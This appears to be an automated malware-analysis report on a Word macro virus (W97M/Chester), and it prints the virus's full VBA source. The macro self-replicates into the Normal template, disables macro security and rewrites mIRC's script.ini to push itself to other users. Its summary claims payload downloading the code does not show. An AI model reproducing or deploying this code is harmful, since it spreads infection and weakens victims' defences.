MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros that execute upon opening the document, as indicated by the Document_Open macro firing. The script attempts to modify mIRC's script.ini file to facilitate the DCC sending of a file named 'chester.txt.doc' and potentially download further payloads. This behavior suggests a downloader or droppper functionality, likely delivered via spearphishing.
Heuristics 3
-
ClamAV: Doc.Trojan.Chester-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Chester-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2692 bytes |
SHA-256: edb09bea13f58cc2248f7013f3dffc3dc2f50d7a67a69c3a522edb602469acd0 |
|||
|
Detection
ClamAV:
Doc.Trojan.Chester-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'W97M/Chester
Private Sub Document_Open()
'W97M/Chester
On Error Resume Next
'W97M/Chester
Set ntc = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
'W97M/Chester
Set adc = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
'W97M/Chester
Call stealth
'W97M/Chester
If adc.lines(1, 1) <> "'W97M/Chester" Then
'W97M/Chester
adc.insertlines 1, ntc.lines(1, ntc.countoflines)
'W97M/Chester
End If
'W97M/Chester
If ntc.lines(1, 1) <> "'W97M/Chester" Then
'W97M/Chester
ntc.insertlines 1, adc.lines(1, adc.countoflines)
End If
'W97M/Chester
If Dir("c:\mirc\mirc32.exe") <> "" Then
'W97M/Chester
Script = "c:\mirc\script.ini"
'W97M/Chester
chester = "c:\mirc\download\chester.txt.doc"
'W97M/Chester
ActiveDocument.SaveAs chester
'W97M/Chester
End If
'W97M/Chester
GoTo mirc
'W97M/Chester
If Dir("c:\Progra~1\mirc\mirc32.exe") <> "" Then
'W97M/Chester
Script = "c:\Progra~1\mirc\script.ini"
'W97M/Chester
chester = "c:\Progra~1\mirc\download\chester.txt.doc"
'W97M/Chester
ActiveDocument.SaveAs chester
'W97M/Chester
End If
'W97M/Chester
mirc:
'W97M/Chester
Open Script For Output As #1
'W97M/Chester
Print #1, "[Script]"
'W97M/Chester
Print #1, ""
'W97M/Chester
Print #1, "n0=on 1:Join:#: {"
'W97M/Chester
Print #1, "n1=/if ($nick == $me ) {Halt}"
'W97M/Chester
Print #1, "n2=/DCC Send chester"
'W97M/Chester
Print #1, "n3=/Clear"
'W97M/Chester
Print #1, "n4=/MOTD"
'W97M/Chester
Print #1, "n5=}"
'W97M/Chester
Close #1
'W97M/Chester
End Sub
'W97M/Chester
Sub stealth()
'W97M/Chester
On Error Resume Next
'W97M/Chester
CommandBars("Macro").Controls("Security").Enabled = 0
'W97M/Chester
CommandBars("Tools").Controls("Macro").Enabled = 0
'W97M/Chester
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = 0
'W97M/Chester
CommandBars("Tools").Controls("Options...").Enabled = 0
'W97M/Chester
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "level") = 1&
'W97M/Chester
End Sub
'W97M/Chester
Sub HelpAbout()
'W97M/Chester
On Error Resume Next
'W97M/Chester
If Day(Now) = 11 Then
'W97M/Chester
MsgBox "Ultimately there is nothing to forgive," & vbCr & "because ther is nothing to judge and " & vbCr & "no one to blame!!", vbSystemModal, "W97M/Chester"
'W97M/Chester
End If
'W97M/Chester
Dialogs(wdDialogHelpAbout).Show
'W97M/Chester
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.